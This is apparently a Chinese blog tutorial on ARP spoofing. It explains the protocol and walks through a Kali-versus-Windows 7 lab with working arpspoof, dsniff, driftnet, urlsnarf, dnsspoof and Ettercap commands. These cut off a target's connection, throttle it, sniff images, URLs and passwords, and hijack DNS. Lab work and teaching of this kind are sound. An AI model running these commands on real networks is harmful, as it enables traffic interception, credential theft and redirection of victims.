做网站网课,wordpress 网站上传,网站制作价格是多少元,网站建设需要的设备学习参考#xff1a; ARP欺骗的各种d玩法-CSDN博客 https://juejin.cn/post/7383702153892954164 一、什么是ARP欺骗
1.什么是ARP#xff1f;
ARP (Address Resolution Protocol) 是一种网络层协议#xff0c;用于将 IP 地址转换为物理地址#xff08;MAC 地址#xff0… 学习参考 ARP欺骗的各种d玩法-CSDN博客 https://juejin.cn/post/7383702153892954164 一、什么是ARP欺骗
1.什么是ARP
ARP (Address Resolution Protocol) 是一种网络层协议用于将 IP 地址转换为物理地址MAC 地址。在局域网中每台设备都有唯一的 MAC 地址而 IP 地址是可以重复分配的。
因此当一个设备需要发送数据到另一个设备时它需要知道另一个设备的MAC 地址。
2.什么是ARP欺骗
ARP欺骗ARP spoofing,又称ARP毒化ARP poisoning 网上多译为ARP病毒或ARP攻击。
ARP 欺骗是一种网络攻击技术通过发送伪造的 ARP数据包让目标设备误以为攻击者是其网关或其它设备从而达到欺骗目标设备的目的。
(针对以太网地址解析协议ARP的一种攻击技术通过欺骗局域网内访问者PC的网关MAC地址使访问者PC错以为攻击者更改后的MAC地址是网关的MAC导致网络不通)
这样攻击者就可以截获目标设备发出的数据包甚至可以修改、篡改数据包中的内容。 ARP欺骗危害 ARP欺骗木马只需成功感染一台电脑就可能导致整个局域网都无法上网严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易盗窃网上银行账号来做非法交易活动等这是木马的惯用伎俩给用户造成了很大的不便和巨大的经济损失。 3.APR欺骗的原理
ARP 欺骗攻击通过伪造 ARP 数据包来破坏网络的正常通信达到攻击的目的。
ARP 欺骗的原理主要基于 ARP 协议的工作原理。 ARP 协议的工作原理 ARP 协议是通过广播请求来获取目标设备的 MAC 地址的。当一个设备需要发送数据到另一个设备时它会发送一个 ARP请求询问局域网内的所有设备是否有指定 IP 地址对应的 MAC 地址。目标设备收到该请求后会回复一个 ARP 应答告诉请求者它的 MAC 地址。 ARP 欺骗利用了这种工作原理攻击者会发送伪造的 ARP 数据包将自己伪装成网关或其它设备。目标设备收到伪造的 ARP 数据包后会将攻击者的 MAC地址映射到目标 IP地址上并将后续数据包发送给攻击者。攻击者就可以截获目标设备发出的数据包甚至可以修改、篡改数据包中的内容。
此时攻击者已经拦截了目标设备和网关之间的数据包传输并可能对数据包进行抓包修改或篡改等攻击。同时攻击者可以再发送伪造的ARP请求将其它设备的IP映射到自己的MAC地址上这样攻击者就可以中间人攻击抓包篡改等等。
二、ARP欺骗的实现
一ARP攻击的实现过程
1、攻击者扫描网络中的 IP 地址和 MAC 地址。
2、攻击者构造伪造的 ARP 数据包其中包含网络中其他设备的 IP 地址和攻击者自己的 MAC 地址。
3、攻击者发送伪造的 ARP 数据包到网络中。
4、被攻击的设备接收到伪造的 ARP 数据包并更新其 ARP 缓存表。
5、之后被攻击的设备将数据包发送到攻击者控制的设备上而不是真正的目标设备因此攻击者可以截获网络流量并篡改数据包。
二ARP欺骗的攻击方法
1.中间人攻击 通过 ARP 欺骗攻击者可以成为网络中的中间人收集网络流量并篡改数据包。
2.数据劫持 攻击者可以通过 ARP 欺骗来获取网络中的敏感信息如用户名和密码。
3.欺骗DNS 攻击者可以通过 ARP 欺骗来重定向 DNS 请求到攻击者控制的服务器上。
4.后门攻击 攻击者可以通过 ARP 欺骗来在网络中放置后门进一步控制被攻击主机。
5.分布式拒绝服务攻击 (DDoS) 攻击者可以通过控制多台设备进行 ARP 欺骗来发起 DDoS 攻击。
三、ARP欺骗的模拟实验 主要参数
-a # 主机 显示 arp 缓冲区的所有条目
-H # 地址类型 指定 arp 指令使用的地址类型
-d # 主机 从 arp 缓冲区中删除指定主机的 arp 条目
-D # 使用指定接口的硬件地址
-e # 以 Linux 的显示风格显示 arp 缓冲区中的条目
-i # 接口 指定要操作 arp 缓冲区的网络接口
-s # 主机 MAC 地址 设置指定的主机的 IP 地址与 MAC 地址的静态映射
-n # 以数字方式显示 arp 缓冲区中的条目
-v # 显示详细的 arp 缓冲区条目包括缓冲区条目的统计信息
-f # 文件 设置主机的 IP 地址与 MAC 地址的静态映射。 虚拟机准备 ip 网关 攻击机kali 192.168.3.45 靶机win7 192.168.3.44 192.168.3.1 两虚拟机设置桥接模式 使用arp -a 查看网关mac 工具准备arpspoof 语法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host参数
-i interface指定要用于发送欺骗数据包的网络接口(eth0...)
-c own|host|both控制是否将欺骗信息发送给目标主机或路由器或者两者都发送。
own表示仅欺骗目标主机host表示仅欺骗路由器both表示同时欺骗两者
-t target指定要欺骗的目标IP地址。
-r用于在主机和目标之间进行双向ARP欺骗。
host想要欺骗的主机的IP地址。1.ARP断网
靶机能ping通百度说明网络环境没问题
下面开始断网攻击 arpspoof -i eth0 -t 192.168.3.44 192.168.3.1
语法:
arpspoof -i 网卡 -t 目标IP 网关也可以使用反向欺骗
arpspoof -i 网卡 -t 网关 目标IP 可欺骗win7的arp缓存表导致win7不能上网这是最常用的ARP断网技术。
win7不能上网的原因是linux默认不转发数据即 此时的kali不转发网关和win7之间的数据导致win7无法上网。
在win7上查看arp -a 查看可以发现网关的mac地址与kali的mac地址一样证明欺骗成功 。
攻击成功后目标主机断网“请求超时”
攻击机中ctrl(shift)c 停止后又可以访问
2.限制网速 使被欺骗的主机能够正常访问网站需要开启路由转发功能 在使用arp欺骗前先开启Kali的IP转发开启后靶机不会断网 echo 1 /proc/sys/net/ipv4/ip_forward查看是否开启
cat /proc/sys/net/ipv4/ip_forward /proc/sys/net/ipv4/ip_forward 是配置文件默认内容为0表示IP转发是关闭的使用上述命令将该配置文件的内容改写为1表示开启IP转发。 关闭路由转发功能 echo 0 /proc/sys/net/ipv4/ip_forward 开启IP转发后 靶机访问网络需要经过攻击机的网卡
于是攻击机限制自己网卡的速度或者转发的速度也就可以限制靶机。
使用工具tc限制网速tc是通过限制自己网卡的速度来限制对方的
限制网速200ms延时
sudo tc qdisc add dev eth0 root netem delay 200ms取消限制网速200ms延时
sudo tc qdisc del dev eth0 root netem delay 200ms参数
qdisc排队规则
add:添加
dev设备网卡
rootroot用户身份
netem delay设置网络延时时间
我这里已经是root账户可不加sudo 限制网速200ms延时使用arpspoof发现靶机被限速证明攻击成功 3.嗅探流量 什么叫流量嗅探 流量中包含着敏感数据攻击者在不入侵你计算机的情况下获得敏感数据这个过程叫流量嗅探。 同样的在使用arp欺骗前 先开启Kali的IP转发
开启IP转发后 流量会经过kali的主机而后再去到目标
这时开启arpspoof进行欺骗后目标就不会断网此时kali可拦截相关受害者主机相关信息开启wireshark拦截受害者ping数据。
arpspoof -i eth0 -t 172.16.17.139 172.16.17.254
过滤来自靶机的流量
ip.addr172.16.17.139 4.嗅探图片
使用driftnet来嗅探图片它可以展示流经网卡的图片严格来说是把流经网卡的图片数据还原为图片即win7上网看到的图片。 安装driftnet 我用24年的kali直接装会报错 需要先改一下源以中科大为例 24中科大Kali镜像源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free non-free-firmware contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free non-free-firmware contrib 重启kali后使用命令安装: apt-get install driftnet 如果还是装不下来可以先更新一下源 apt-get upgrade 使用driftnet -i eth0 来窃取受害者网络中传输的图片图片以小窗口的形式显示。 安装: sudo apt install driftnetdriftnet -help --获取使用文档语法 driftnet [options] [filter code]主要参数-b 捕获到新的图片时发出嘟嘟声-i interface 选择监听接口-f file 读取一个指定pcap数据包中的图片-p 不让所监听的接口使用混杂模式-a 后台模式将捕获的图片保存到目录中不会显示在屏幕上-m number 指定保存图片数的数目-d directory 指定保存图片的路径-x prefix 指定保存图片的前缀名实时抓取图片
第一步开启数据转发
echo 1 /proc/sys/net/ipv4/ip_forward
第二步arp欺骗
arpspoof -i eth0 -t 192.168.158.56 198.168.158.52
第三步driftnet实时抓取图片
driftnet -i eth0 #eth0是要抓的网卡
但是这个工具公认的难用没抓到图片 保存抓取下来的图片
操作同上改变一下driftnet的命令
driftnet -i eth0 -a -d /tmp/win7
5.嗅探访问的URL
webspy使用webspy嗅探受害者访问了哪些网页。
操作同嗅探图片 然后使用webspy来抓但是只能抓取一次。
webspy -i eth0 192.168.158.56 urlsnarf既能抓URL也能抓图片
使用urlsnarf嗅探受害者访问了哪些网页默认抓取80、8080、3128端口的数据。 开启路由转发功能使用arpspoof开启欺骗然后使用urlsnarf来抓这个工具好用一些
urlsnarf -i eth0 6.dsniff 嗅探账密
当网络中出现了填写账号密码的数据时dsniff工具就开始截获数据-m参数会解析网络协议。 开启路由转发功能使用arpspoof开启欺骗然后使用dsniff来抓。注意dsniff不会实时显示结果当在win7中输入quit的时候dsniff才会显示结果
dsniff -i eth0 -m 可以发现当用户登录时成功获取到了账号和密码。
ftpopen 115.146.60.252
//尝试连接到IP地址为115.146.60.252的FTP服务器。
//这是FTP客户端用来初始化与服务器通信的标准命令。连接成功就能够登录到该服务器并进行文件的上传、下载等操作
7.dns欺骗
dnsspoof启用DNS欺骗如果是请求解析某个域名dnsspoof会让该域名重新指向另一个IP地址黑客所控制的主机如果dnsspoof嗅探到局域网内有DNS请求数据包它会分析其内容并用伪造的DNS响应包来回复请求者。由于dns查询是客户机向网关发起请求所以如果要在局域网中实现DNS欺骗前提仍然是arp欺骗。
arpspoof -i eth0 -t 172.16.17.139 172.16.17.254 //ip 网关
e.g 攻击目的当靶机访问百度的时候会被我们劫持
1vim编辑 dnsspoof 配置文件
updatedb //更新locate的数据库
locate dnsspoof.host //使用locate命令定位文件位置 vim /usr/share/dsniff/dnsspoof.hosts //使用vim编辑配置文件
//用法: i插入模式——ESC——:wq——回车保存并退出 2kali上开启apache服务让受害者可以访问到页面
systemctl start apache2.service
3发起DNS欺骗
dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts-i参数指定网卡-f调用配置文件
udp dst port 53
//kali机会监听eth0网卡中发往udp53端口的数据包 四、Ettercap的使用
kali自带
ettercap是一种网络嗅探器和中间人攻击工具通常用于网络安全测试和攻击。它可以捕获网络流量并进行分析同时还可以修改和重定向流量以执行中间人攻击。
使用ettercap攻击者可以轻松地欺骗受害者从而获取敏感信息例如登录凭据、信用卡号码等。同时ettercap也可以用作网络安全工具以检测和纠正网络漏洞和安全漏洞。
使用ettercap进行ARP欺骗攻击实验(保姆级教程)-CSDN博客
启动 Ettercap
在终端中输入以下命令启动 Ettercap 图形界面
sudo ettercap -G 选择eth0后点击右上方的 √ 然后点击左上方的扫描该网段的所有主机信息 然后点击右面的hosts-list查看扫描结果可以看到已经将win7的ip 172.16.17.139扫描出来了 1.ARP欺骗
进行 ARP欺骗分别将靶机网关ip 172.16.17.254和Win7ip 172.16.17.139 分别添加为Target1和Target2 点击小地球图标MITM menu中选择ARP Poisoning 点击ok开始攻击成功 查看Win7的mac地址已经变成了攻击机kali的mac地址win7可以连网 打开ettercap的终端不要关闭关闭了就不能继续进行欺骗攻击了
wireshark 嗅探流量 dsniff 嗅探账密 ARP实验均可实现。
2.DNS欺骗
e.g 攻击目的使得win7的网络访问转移到攻击机Kali上
1vim编辑 etter.dns 配置文件
locate etter.dns //使用locate命令定位文件位置 sudo vim /etc/ettercap/etter.dns //使用vim编辑配置文件
将攻击机kali的ip地址172.16.17.227添加到如下位置保存退出 打开kali的apache服务
systemctl start apache2.service 在ettercap上进行DNS劫持
点击右上方的三个竖排点选择plugins——Manage plugins 双击选择攻击模式 dns_spoof 在win7上访问百度通过ping 发现响应包不正常了ddc5是kali的962f说明DNS劫持成功。
